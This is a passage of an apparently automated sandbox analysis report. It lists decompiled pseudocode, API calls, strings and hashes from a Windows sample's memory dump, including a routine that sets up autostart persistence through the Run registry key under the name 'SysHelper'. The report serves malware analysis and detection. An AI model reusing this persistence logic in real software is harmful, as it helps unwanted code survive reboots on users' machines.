										DestroyWindow(_t195);
									}
								}
							} else {
								_t40 = _t206 + 0x28; // 0x28
								_t161 = _t40;
								do {
									__eflags =  *((intOrPtr*)(_t161 - 0x24)) - 1;
									if( *((intOrPtr*)(_t161 - 0x24)) == 1) {
										__eflags =  *((intOrPtr*)(_t161 - 0x20)) - 3;
										if( *((intOrPtr*)(_t161 - 0x20)) == 3) {
											_t218 = _t216 - 0x18;
											_t171 = _t218;
											_v2436 = _t218;
											_push(0xffffffff);
											 *((intOrPtr*)(_t171 + 0x14)) = 7;
											 *(_t171 + 0x10) = 0;
											 *_t171 = 0;
											E00414690(_t161, _t171,  &_v2432, 0);
											_t219 = _t218 - 0x18;
											_v20 = 2;
											_t172 = _t219;
											_push(0xffffffff);
											 *((intOrPtr*)(_t172 + 0x14)) = 7;
											 *(_t172 + 0x10) = 0;
											 *_t172 = 0;
											E00414690(_t161, _t172, _t161, 0);
											_v32 = 0;
											_t125 = E0040EFF0(0);
											_t216 = _t219 + 0x30;
											__eflags = _t125 - 0xffffffff;
											if(_t125 != 0xffffffff) {
												_t170 = _v2448;
											} else {
												_v2388 = 0;
												_v2384 = 0;
												E0041C330(_t194, _t206,  &_v2388);
												_t128 = E00419D10( &_v2308);
												_v20 = 3;
												E0041C240(_t194, _t206, _t128);
												_v24 = 0;
												E0041B680( &_v2312);
												_t176 =  *0x513268;
												_t131 =  *_t176;
												_t197 =  *((intOrPtr*)(_t176 + 4)) + 8;
												_v2452 =  *((intOrPtr*)(_t176 + 4)) + 8;
												 *((intOrPtr*)(_t131 + 0x8c8)) =  *((intOrPtr*)( *_t176 + 0x8c8)) + 1;
												E0041B8B0(_t161, _t197, _t131 + 8);
												_v2404 = 7;
												_push(0xffffffff);
												_v2408 = 0;
												_v2424 = 0;
												E00414690(_t161,  &_v2424, _t161, 0);
												_v40 = 4;
												_t136 = E0041CE80( &_v2356,  &_v2436, "\\");
												_t216 = _t216 + 4;
												E004131D0(_t197 + 0x8a4, _t136);
												__eflags = _v2340 - 8;
												if(_v2340 >= 8) {
													L00422587(_v2336);
													_t216 = _t216 + 4;
												}
												_v2316 = 7;
												_v20 = 0;
												__eflags = _v2396 - 8;
												_v2320 = 0;
												_v2336 = 0;
												if(_v2396 >= 8) {
													L00422587(_v2416);
													_t216 = _t216 + 4;
												}
												_v2396 = 7;
												_v2416 = 0;
												_t140 =  *0x529228; // 0x5cd750
												_v2400 = 0;
												_t194 =  *((intOrPtr*)(_t140 + 4)) + 8;
												_t141 = CreateThread(0, 0, E0041F130, _v2448, 0, _t194);
												__eflags = _t141;
												_t194[1] = _t141;
												_t170 =  !=  ? 1 : _v2456 & 0x000000ff;
												_v2456 = _t170;
											}
										}
									}
									_t206 = _t206 + 0x70;
									_t161 = _t161 + 0x70;
									__eflags = _t206 -  *0x529244; // 0x0
								} while (__eflags != 0);
								__eflags = _t170;
								if(_t170 == 0) {
									goto L37;
								}
							}
							__eflags = _v2412 - 8;
							if(_v2412 >= 8) {
								L00422587(_v2432);
							}
							goto L49;
						} else {
							goto L15;
						}
					}
				} else {
					if(_t221 == 0) {
						_t185 =  *0x513268;
						_t151 =  *_t185;
						__eflags = _t151 - _t185;
						if(_t151 == _t185) {
							goto L49;
						} else {
							while(1) {
								__eflags =  *((char*)(_t151 + 0xd));
								if( *((char*)(_t151 + 0xd)) != 0) {
									_t152 = DefWindowProcW(_a4, 0x8001, _a12, _a16);
									 *[fs:0x0] = _v16;
									return _t152;
								}
								_t151 =  *_t151;
								__eflags = _t151 - _t185;
								if(_t151 != _t185) {
									continue;
								} else {
									goto L49;
								}
								goto L51;
							}
						}
					} else {
						_t154 = _t164 - 2;
						if(_t154 == 0) {
							PostQuitMessage(0);
							L49:
							 *[fs:0x0] = _v16;
							return 0;
						} else {
							_t155 = _t154 - 0xf;
							if(_t155 == 0) {
								goto L49;
							} else {
								_t156 = _t155 - 5;
								if(_t156 != 0) {
									L15:
									_t150 = DefWindowProcW(_a4, _t164, _a12, _a16);
									 *[fs:0x0] = _v16;
									return _t150;
								} else {
									if(_a12 != _t156) {
										E00411CD0(_t158, 0, _t156);
										L47:
										_t203 = _a4;
										if(IsWindow(_t203) != 0) {
											 *0x529224 = 1;
											DestroyWindow(_t203);
										}
									}
									goto L49;
								}
							}
						}
					}
				}
				L51:
			}

0x0041bae3
0x0041baec
0x0041baef
0x0041baf1
0x0041baf6
0x0041baf7
0x0041bafe
0x0041bb04
0x0041bb06
0x0041bb07
0x0041bb0d
0x0041bba2
0x0041bba2
0x0041bba7
0x0041bf3d
0x0041bf43
0x0041bf45
0x0041bf47
0x0041bf5c
0x0041bf5c
0x0041bf63
0x00000000
0x00000000
0x00000000
0x00000000
0x0041bf50
0x0041bf50
0x0041bf50
0x0041bf54
0x00000000
0x00000000
0x0041bf56
0x0041bf58
0x0041bf5a
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0041bf5a
0x0041bf9a
0x0041bfa8
0x0041bfb7
0x0041bfc2
0x0041bfc2
0x0041bbad
0x0041bbad
0x0041bbae
0x0041bbdc
0x0041bbec
0x0041bbf4
0x0041bbfc
0x0041bc04
0x0041bc0c
0x0041bc1a
0x0041bc21
0x0041bc29
0x0041bc3a
0x0041bc3c
0x0041bc43
0x0041bc45
0x0041bc5a
0x0041bc5c
0x0041bc69
0x0041bc71
0x0041bc76
0x0041bc76
0x0041bc7b
0x0041bc80
0x0041bc86
0x0041bc8b
0x0041bc8b
0x0041bc90
0x0041bc98
0x0041bc9f
0x0041bca4
0x0041bcac
0x0041bcb1
0x0041bcb7
0x0041bcbc
0x0041bcbc
0x0041bcc1
0x0041bcca
0x0041bcd2
0x0041bcd7
0x0041bcdc
0x0041bce2
0x0041bce4
0x0041bce7
0x0041bceb
0x0041bcf1
0x0041befb
0x0041bf01
0x0041bf05
0x0041bf07
0x0041bf0d
0x0041bf0f
0x0041bf11
0x0041bf18
0x0041bf1b
0x0041bf22
0x0041bf22
0x0041bf18
0x0041bcf7
0x0041bcf7
0x0041bcf7
0x0041bd00
0x0041bd00
0x0041bd04
0x0041bd0a
0x0041bd0e
0x0041bd14
0x0041bd19
0x0041bd1b
0x0041bd1f
0x0041bd21
0x0041bd28
0x0041bd30
0x0041bd38
0x0041bd3d
0x0041bd40
0x0041bd48
0x0041bd4c
0x0041bd4f
0x0041bd56
0x0041bd5e
0x0041bd61
0x0041bd68
0x0041bd70
0x0041bd75
0x0041bd78
0x0041bd7b
0x0041bee1
0x0041bd81
0x0041bd85
0x0041bd8e
0x0041bd96
0x0041bda2
0x0041bda8
0x0041bdb0
0x0041bdbc
0x0041bdc4
0x0041bdc9
0x0041bdcf
0x0041bdd4
0x0041bdd9
0x0041bddd
0x0041bde7
0x0041bdee
0x0041bdf6
0x0041bdfe
0x0041be06
0x0041be0b
0x0041be19
0x0041be28
0x0041be2d
0x0041be37
0x0041be3c
0x0041be44
0x0041be4d
0x0041be52
0x0041be52
0x0041be57
0x0041be62
0x0041be69
0x0041be6e
0x0041be79
0x0041be81
0x0041be87
0x0041be8c
0x0041be8c
0x0041be91
0x0041be99
0x0041be9e
0x0041bea3
0x0041beae
0x0041bec1
0x0041becb
0x0041becd
0x0041bed8
0x0041bedb
0x0041bedb
0x0041bd7b
0x0041bd0e
0x0041bee5
0x0041bee8
0x0041beeb
0x0041beeb
0x0041bef7
0x0041bef9
0x00000000
0x00000000
0x0041bef9
0x0041bf28
0x0041bf2d
0x0041bf33
0x0041bf38
0x00000000
0x00000000
0x00000000
0x00000000
0x0041bbae
0x0041bb13
0x0041bb13
0x0041bb54
0x0041bb5a
0x0041bb5c
0x0041bb5e
0x00000000
0x00000000
0x0041bb64
0x0041bb64
0x0041bb68
0x0041bb83
0x0041bb90
0x0041bb9d
0x0041bb9d
0x0041bb6a
0x0041bb6c
0x0041bb6e
0x00000000
0x0041bb70
0x00000000
0x0041bb70
0x00000000
0x0041bb6e
0x0041bb64
0x0041bb15
0x0041bb17
0x0041bb1a
0x0041bb49
0x0041bf81
0x0041bf8a
0x0041bf97
0x0041bb1c
0x0041bb1c
0x0041bb1f
0x00000000
0x0041bb25
0x0041bb25
0x0041bb28
0x0041bbb0
0x0041bbba
0x0041bbc7
0x0041bbd4
0x0041bb2e
0x0041bb31
0x0041bb3a
0x0041bf65
0x0041bf65
0x0041bf71
0x0041bf74
0x0041bf7b
0x0041bf7b
0x0041bf71
0x00000000
0x0041bb31
0x0041bb28
0x0041bb1f
0x0041bb1a
0x0041bb13
0x00000000

APIs

PostQuitMessage.USER32(00000000), ref: 0041BB49
DefWindowProcW.USER32(?,?,?,?), ref: 0041BBBA
_malloc.LIBCMT ref: 0041BBE4
GetComputerNameW.KERNEL32 ref: 0041BBF4
_free.LIBCMT ref: 0041BCD7

Part of subcall function 00411CD0: RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D12
Part of subcall function 00411CD0: _memset.LIBCMT ref: 00411D3B
Part of subcall function 00411CD0: RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00411D63
Part of subcall function 00411CD0: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D6C
Part of subcall function 00411CD0: lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00411DD6
Part of subcall function 00411CD0: PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00411E48

IsWindow.USER32(?), ref: 0041BF69
DestroyWindow.USER32(?), ref: 0041BF7B
DefWindowProcW.USER32(?,00008003,?,?), ref: 0041BFA8

Memory Dump Source

Source File: 00000002.00000002.380176019.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.381419053.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.381432579.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: Window$Proc$CloseComputerDestroyExistsFileMessageNameOpenPathPostQueryQuitValue_free_malloc_memsetlstrlen
String ID:
API String ID: 3873257347-0
Opcode ID: b321b903376fa63719e892096b3ee7b2e5a70edac2dc072ca16871a05d7122ce
Instruction ID: 866eb7db68ae170cd8e17be643faf7720e0ae735171854e0fa5cbc2bc792534d
Opcode Fuzzy Hash: b321b903376fa63719e892096b3ee7b2e5a70edac2dc072ca16871a05d7122ce
Instruction Fuzzy Hash: 85C19171508340AFDB20DF25DD45B9BBBE0FF85318F14492EF888863A1D7799885CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00425B6E Relevance: 18.1, APIs: 12, Instructions: 131
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 84%

			E00425B6E(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, signed int _a8, char _a12) {
				signed int _v8;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				void* _t38;
				signed int _t45;
				signed int _t60;
				intOrPtr _t77;
				void* _t80;
				intOrPtr* _t82;
				signed int _t83;
				signed int _t86;
				intOrPtr _t88;
				void* _t92;

				_t80 = __edx;
				_push(__ebx);
				_push(__esi);
				_t86 = 0;
				if(_a12 <= 0) {
					L5:
					return _t38;
				} else {
					_push(__edi);
					_t82 =  &_a12;
					while(1) {
						_t82 = _t82 + 4;
						_t38 = E004295C3(_a4, _a8,  *_t82);
						_t92 = _t92 + 0xc;
						if(_t38 != 0) {
							break;
						}
						_t86 = _t86 + 1;
						if(_t86 < _a12) {
							continue;
						} else {
							goto L5;
						}
						goto L20;
					}
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E004242FD(0, _t80);
					asm("int3");
					_push(0x14);
					_push(0x507ab0);
					E00428520(0, _t82, _t86);
					_t66 = 0;
					_v32 = 0;
					__eflags = _a4 - 5;
					if(__eflags <= 0) {
						_t88 = E00425007();
						_v36 = _t88;
						E004245DC(0, _t82, _t88, __eflags);
						 *(_t88 + 0x70) =  *(_t88 + 0x70) | 0x00000010;
						_v8 = _v8 & 0;
						_t83 = E00428C96(0xb8, 1);
						_v40 = _t83;
						__eflags = _t83;
						if(_t83 != 0) {
							E00428AF7(0xc);
							_v8 = 1;
							E004255AC(_t83,  *((intOrPtr*)(_t88 + 0x6c)));
							_v8 = _v8 & 0x00000000;
							E00425CE3();
							_t66 = E00425E97(0, _t80, _t83, _t88, _t83, _a4, _a8);
							_v32 = _t66;
							__eflags = _t66;
							if(_t66 == 0) {
								E0042453C(_t83);
								_t43 = E004243E2(_t83);
							} else {
								__eflags = _a8;
								if(_a8 != 0) {
									_t60 = E00437413(_a8, 0x50a97c);
									__eflags = _t60;
									if(_t60 != 0) {
										 *0x510434 = 1;
									}
								}
								E00428AF7(0xc);
								_v8 = 2;
								_t25 = _t88 + 0x6c; // 0x6c
								E0042465C(_t25, _t83);
								E0042453C(_t83);
								__eflags =  *(_t88 + 0x70) & 0x00000002;
								if(( *(_t88 + 0x70) & 0x00000002) == 0) {
									__eflags =  *0x50aba8 & 0x00000001;
									if(( *0x50aba8 & 0x00000001) == 0) {
										E0042465C(0x50aae4,  *((intOrPtr*)(_t88 + 0x6c)));
										_t77 =  *0x50aae4; // 0x50aae8
										_t32 = _t77 + 0x84; // 0x50b030
										 *0x50b028 =  *_t32;
										_t33 = _t77 + 0x90; // 0x4d0da8
										 *0x50b084 =  *_t33;
										_t34 = _t77 + 0x74; // 0x1
										 *0x50a978 =  *_t34;
									}
								}
								_v8 = _v8 & 0x00000000;
								_t43 = E00425CF2();
							}
						}
						_v8 = 0xfffffffe;
						E00425D25(_t43, _t88);
						_t45 = _t66;
					} else {
						 *((intOrPtr*)(E00425208(__eflags))) = 0x16;
						E004242D2();
						_t45 = 0;
					}
					return E00428565(_t45);
				}
				L20:
			}

0x00425b6e
0x00425b71
0x00425b74
0x00425b75
0x00425b7a
0x00425b9e
0x00425ba1
0x00425b7c
0x00425b7c
0x00425b7d
0x00425b80
0x00425b80
0x00425b8b
0x00425b90
0x00425b95
0x00000000
0x00000000
0x00425b97
0x00425b9b
0x00000000
0x00425b9d
0x00000000
0x00425b9d
0x00000000
0x00425b9b
0x00425ba2
0x00425ba3
0x00425ba4
0x00425ba5
0x00425ba6
0x00425ba7
0x00425bac
0x00425bad
0x00425baf
0x00425bb4
0x00425bb9
0x00425bbb
0x00425bbe
0x00425bc2
0x00425be0
0x00425be2
0x00425be5
0x00425bea
0x00425bee
0x00425bff
0x00425c01
0x00425c04
0x00425c06
0x00425c0e
0x00425c14
0x00425c1f
0x00425c26
0x00425c2a
0x00425c3e
0x00425c40
0x00425c43
0x00425c45
0x00425cfe
0x00425d04
0x00425c4b
0x00425c4b
0x00425c4f
0x00425c59
0x00425c60
0x00425c62
0x00425c64
0x00425c64
0x00425c62
0x00425c70
0x00425c76
0x00425c7d
0x00425c82
0x00425c88
0x00425c90
0x00425c94
0x00425c96
0x00425c9d
0x00425ca7
0x00425cae
0x00425cb4
0x00425cba
0x00425cbf
0x00425cc5
0x00425cca
0x00425ccd
0x00425ccd
0x00425c9d
0x00425cd2
0x00425cd6
0x00425cd6
0x00425c45
0x00425d0b
0x00425d12
0x00425d17
0x00425bc4
0x00425bc9
0x00425bcf
0x00425bd4
0x00425bd4
0x00425d1e
0x00425d1e
0x00000000

APIs

__invoke_watson.LIBCMT ref: 00425BA7
__calloc_crt.LIBCMT ref: 00425BF8
__lock.LIBCMT ref: 00425C0E
__copytlocinfo_nolock.LIBCMT ref: 00425C1F
__wsetlocale_nolock.LIBCMT ref: 00425C36
_wcscmp.LIBCMT ref: 00425C59
__lock.LIBCMT ref: 00425C70
__updatetlocinfoEx_nolock.LIBCMT ref: 00425C82
___removelocaleref.LIBCMT ref: 00425C88
__updatetlocinfoEx_nolock.LIBCMT ref: 00425CA7

Memory Dump Source

Source File: 00000002.00000002.380176019.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.381419053.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.381432579.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__invoke_watson__wsetlocale_nolock_wcscmp
String ID:
API String ID: 2762079118-0
Opcode ID: e61c58fd63962ed3f5b4d1593b57eb658f03b58a302d0c09fb7b18677bdb7f56
Instruction ID: 0fe30f67420a0b57e0336c9221d2143c2ac41a82f10de3dc78134a272e9def7d
Opcode Fuzzy Hash: e61c58fd63962ed3f5b4d1593b57eb658f03b58a302d0c09fb7b18677bdb7f56
Instruction Fuzzy Hash: BE412932700724AFDB11AFA6B886B9E7BE0EF44318F90802FF51496282DB7D9544DB1D

Uniqueness

Uniqueness Score: -1.00%

Function 00411B90 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 110
stringcomCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E00411B90(void* __ecx, WCHAR* __edx, void* _a4) {
				void* _v8;
				void* _v12;
				struct _ITEMIDLIST* _v16;
				char _v20;
				short _v532;
				char* _t30;
				intOrPtr* _t34;
				intOrPtr* _t35;
				intOrPtr* _t43;
				intOrPtr* _t48;
				intOrPtr* _t49;
				void* _t50;
				WCHAR* _t51;
				intOrPtr* _t54;
				intOrPtr* _t55;
				void* _t67;
				void* _t70;

				_t51 = __edx;
				_v8 = 0;
				_v12 = 0;
				__imp__CoInitialize(0, _t67, _t70, _t50);
				_t30 =  &_v8;
				__imp__CoCreateInstance(0x4ce908, 0, 1, 0x4cd568, _t30);
				__imp__CoUninitialize();
				if(_t30 >= 0) {
					_t34 = _v8;
					_t30 =  *((intOrPtr*)( *_t34))(_t34, 0x4cf2e8,  &_v12);
					if(_t30 >= 0) {
						_t35 = _v8;
						_t30 =  *((intOrPtr*)( *_t35 + 0x50))(_t35, __ecx);
						if(_t30 >= 0) {
							SHGetSpecialFolderLocation(_a4, 7,  &_v16);
							__imp__SHGetPathFromIDListW(_v16,  &_v532);
							lstrcatW( &_v532, "\\");
							lstrcatW( &_v532, _t51);
							_t43 = _v12;
							_t30 =  *((intOrPtr*)( *_t43 + 0x18))(_t43,  &_v532, 1);
							if(_t30 >= 0) {
								GetSystemDirectoryW( &_v532, 0x100);
								lstrcatW( &_v532, L"\\shell32.dll");
								_t48 = _v8;
								_t30 =  *((intOrPtr*)( *_t48 + 0x44))(_t48,  &_v532, 1);
								if(_t30 >= 0) {
									_t49 = _v8;
									_t30 =  *((intOrPtr*)( *_t49 + 0x40))(_t49,  &_v532, 0x100,  &_v20);
								}
							}
						}
					}
				}
				_t54 = _v12;
				if(_t54 != 0) {
					_t30 =  *((intOrPtr*)( *_t54 + 8))(_t54);
				}
				_t55 = _v8;
				if(_t55 == 0) {
					return _t30;
				} else {
					return  *((intOrPtr*)( *_t55 + 8))(_t55);
				}
			}

0x00411b9e
0x00411ba0
0x00411ba9
0x00411bb0
0x00411bb6
0x00411bc8
0x00411bd0
0x00411bd8
0x00411bde
0x00411bed
0x00411bf1
0x00411bf7
0x00411bfe
0x00411c03
0x00411c12
0x00411c22
0x00411c3a
0x00411c44
0x00411c46
0x00411c55
0x00411c5a
0x00411c68
0x00411c7a
0x00411c7c
0x00411c8b
0x00411c90
0x00411c92
0x00411ca8
0x00411ca8
0x00411c90
0x00411c5a
0x00411c03
0x00411bf1
0x00411cab
0x00411cb3
0x00411cb8
0x00411cb8
0x00411cbb
0x00411cc0
0x00411ccb
0x00411cc2
0x00000000
0x00411cc5

APIs

CoInitialize.OLE32(00000000), ref: 00411BB0
CoCreateInstance.OLE32(004CE908,00000000,00000001,004CD568,00000000), ref: 00411BC8
CoUninitialize.OLE32 ref: 00411BD0
SHGetSpecialFolderLocation.SHELL32(00000000,00000007,?), ref: 00411C12
SHGetPathFromIDListW.SHELL32(?,?), ref: 00411C22
lstrcatW.KERNEL32(?,00500050), ref: 00411C3A
lstrcatW.KERNEL32(?), ref: 00411C44
GetSystemDirectoryW.KERNEL32(?,00000100), ref: 00411C68
lstrcatW.KERNEL32(?,\shell32.dll), ref: 00411C7A

Strings

\shell32.dll, xrefs: 00411C6E

Memory Dump Source

Source File: 00000002.00000002.380176019.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.381419053.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.381432579.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: lstrcat$CreateDirectoryFolderFromInitializeInstanceListLocationPathSpecialSystemUninitialize
String ID: \shell32.dll
API String ID: 679253221-3783449302
Opcode ID: 45e46fc2f9e137a48023c8b07f4e0b5fd5f09384ac33b8a62bbc2b8c253a451b
Instruction ID: 1ac700bd2dba931ae0f93f3cd35093afe8c3aec66b03df765643047a9f16b657
Opcode Fuzzy Hash: 45e46fc2f9e137a48023c8b07f4e0b5fd5f09384ac33b8a62bbc2b8c253a451b
Instruction Fuzzy Hash: 1D415E70A40209AFDB10CBA4DC88FEA7B7CEF44705F104499F609D7160D6B4AA45CB54

Uniqueness

Uniqueness Score: -1.00%

Function 004549A0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 107
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 77%

			E004549A0(void* __ebx) {
				signed int _v8;
				long _v12;
				void* _v16;
				void* _v24;
				void* __edi;
				void* __esi;
				signed int _t21;
				CHAR* _t23;
				void* _t31;
				unsigned int _t34;
				struct HINSTANCE__* _t42;
				void* _t43;
				void* _t52;
				void* _t54;
				void* _t55;
				long _t56;
				signed int _t58;
				void* _t59;

				_t43 = __ebx;
				E0042F7C0(0xc);
				_t21 =  *0x50ad20; // 0xcafe2c1d
				_v8 = _t21 ^ _t58;
				_t23 =  *0x512a94;
				if(_t23 != 0) {
					L12:
					if(_t23 == 0xffffffff) {
						goto L6;
					} else {
						 *_t23();
						return E0042A77E(_t43, _v8 ^ _t58, _t52, _t54, _t56);
					}
				} else {
					_t42 = GetModuleHandleA(_t23);
					if(_t42 == 0) {
						_t23 =  *0x512a94;
					} else {
						_t23 = GetProcAddress(_t42, "_OPENSSL_isservice");
						 *0x512a94 = _t23;
					}
					if(_t23 != 0) {
						goto L12;
					} else {
						 *0x512a94 = 0xffffffff;
						L6:
						GetDesktopWindow();
						_t55 = GetProcessWindowStation();
						if(_t55 == 0 || GetUserObjectInformationW(_t55, 2, 0, 0,  &_v12) != 0 || GetLastError() != 0x7a) {
							L14:
							return E0042A77E(_t43, _v8 ^ _t58, _t52, _t55, _t56);
						} else {
							_t56 = _v12;
							if(_t56 > 0x200) {
								goto L14;
							} else {
								_t56 = _t56 + 0x00000001 & 0xfffffffe;
								E0043F980(_t56 + 2, _t56);
								_t31 = _t59;
								_v16 = _t31;
								if(GetUserObjectInformationW(_t55, 2, _t31, _t56,  &_v12) == 0) {
									goto L14;
								} else {
									_t47 = _v16;
									_t34 = _v12 + 0x00000001 & 0xfffffffe;
									_v12 = _t34;
									_push(L"Service-0x");
									 *((short*)(_v16 + (_t34 >> 1) * 2)) = 0;
									E00421C02(_v16);
									asm("sbb eax, eax");
									return E0042A77E(_t43, _v8 ^ _t58, 0, _t55, _t56, _t47);
								}
							}
						}
					}
				}
			}

0x004549a0
0x004549a8
0x004549ad
0x004549b4
0x004549b7
0x004549c0
0x00454aab
0x00454aae
0x00000000
0x00454ab4
0x00454ab4
0x00454ac8
0x00454ac8
0x004549c6
0x004549c7
0x004549cf
0x004549e4
0x004549d1
0x004549d7
0x004549dd
0x004549dd
0x004549eb
0x00000000
0x004549f1
0x004549f1
0x004549fb
0x004549fb
0x00454a07
0x00454a0b
0x00454ac9
0x00454ade
0x00454a39
0x00454a39
0x00454a42
0x00000000
0x00454a48
0x00454a49
0x00454a52
0x00454a57
0x00454a62
0x00454a6d
0x00000000
0x00454a6f
0x00454a74
0x00454a78
0x00454a7b
0x00454a80
0x00454a86
0x00454a8a
0x00454a94
0x00454aaa
0x00454aaa
0x00454a6d
0x00454a42
0x00454a0b
0x004549eb

APIs

GetModuleHandleA.KERNEL32(?,?,00000001,?,00454B72), ref: 004549C7
GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 004549D7
GetDesktopWindow.USER32 ref: 004549FB
GetProcessWindowStation.USER32(?,00454B72), ref: 00454A01
GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,00454B72), ref: 00454A1C
GetLastError.KERNEL32(?,00454B72), ref: 00454A2A
GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,00454B72), ref: 00454A65
_wcsstr.LIBCMT ref: 00454A8A

Strings

Service-0x, xrefs: 00454A80
_OPENSSL_isservice, xrefs: 004549D1

Memory Dump Source

Source File: 00000002.00000002.380176019.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.381419053.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.381432579.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: InformationObjectUserWindow$AddressDesktopErrorHandleLastModuleProcProcessStation_wcsstr
String ID: Service-0x$_OPENSSL_isservice
API String ID: 2112994598-1672312481
Opcode ID: 839ece2f53d05b3d3a3b41915715d02d267126b8b76695ecb3f97597e52a1477
Instruction ID: a4b3c478c226dd270820e71b951499fe23bca8177d071b610c32d3665965eb2a
Opcode Fuzzy Hash: 839ece2f53d05b3d3a3b41915715d02d267126b8b76695ecb3f97597e52a1477
Instruction Fuzzy Hash: 04312831A401049BCB10DBBAEC46AAE7778DFC4325F10426BFC19D72E1EB349D148B58

Uniqueness

Uniqueness Score: -1.00%

Function 00454AE0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 75
registrywindowCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 91%

			E00454AE0(void* __ebx, void* __edx, void* __edi, void* __esi, char _a4, char _a259, signed int _a260, wchar_t* _a268, void _a272) {
				CHAR* _v0;
				signed int _t17;
				void* _t19;
				void* _t46;
				void* _t49;
				void* _t50;
				signed int _t51;
				signed int _t52;

				_t48 = __esi;
				_t47 = __edi;
				_t46 = __edx;
				_t39 = __ebx;
				E0042F7C0(0x108);
				_t17 =  *0x50ad20; // 0xcafe2c1d
				_a260 = _t17 ^ _t51;
				_t19 = GetStdHandle(0xfffffff4);
				if(_t19 == 0 || GetFileType(_t19) == 0) {
					vswprintf( &_a4, 0xff, _a268,  &_a272);
					_t52 = _t51 + 0x10;
					_a259 = 0;
					if(E004549A0(_t39) <= 0) {
						MessageBoxA(0,  &_a4, "OpenSSL: FATAL", 0x10);
						return E0042A77E(_t39, _a260 ^ _t52, _t46, _t47, _t48);
					} else {
						_t49 = RegisterEventSourceA(0, "OPENSSL");
						_v0 =  &_a4;
						ReportEventA(_t49, 1, 0, 0, 0, 1, 0,  &_v0, 0);
						DeregisterEventSource(_t49);
						_t50 = _t48;
						return E0042A77E(_t39, _a260 ^ _t52, _t46, _t47, _t50);
					}
				} else {
					E0042BDCC(E00420E4D() + 0x40, _a268,  &_a272);
					return E0042A77E(__ebx, _a260 ^ _t51 + 0x0000000c, _t46, __edi, __esi);
				}
			}

0x00454ae0
0x00454ae0
0x00454ae0
0x00454ae0
0x00454ae5
0x00454aea
0x00454af1
0x00454afa
0x00454b02
0x00454b5d
0x00454b62
0x00454b65
0x00454b74
0x00454bd3
0x00454bed
0x00454b76
0x00454b86
0x00454b8c
0x00454ba2
0x00454ba9
0x00454baf
0x00454bc4
0x00454bc4
0x00454b0f
0x00454b27
0x00454b43
0x00454b43

APIs

GetStdHandle.KERNEL32(000000F4,00454C16,%s(%d): OpenSSL internal error, assertion failed: %s,?,?,?,0045480E,.\crypto\cryptlib.c,00000253,pointer != NULL,?,00451D37,00000000,0040CDAE,00000001,00000001), ref: 00454AFA
GetFileType.KERNEL32(00000000,?,00451D37,00000000,0040CDAE,00000001,00000001), ref: 00454B05
__vfwprintf_p.LIBCMT ref: 00454B27

Part of subcall function 0042BDCC: _vfprintf_helper.LIBCMT ref: 0042BDDF

vswprintf.LIBCMT ref: 00454B5D
RegisterEventSourceA.ADVAPI32(00000000,OPENSSL), ref: 00454B7E
ReportEventA.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 00454BA2
DeregisterEventSource.ADVAPI32(00000000), ref: 00454BA9
MessageBoxA.USER32 ref: 00454BD3

Strings

OpenSSL: FATAL, xrefs: 00454BC7
OPENSSL, xrefs: 00454B77

Memory Dump Source

Source File: 00000002.00000002.380176019.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.381419053.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.381432579.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

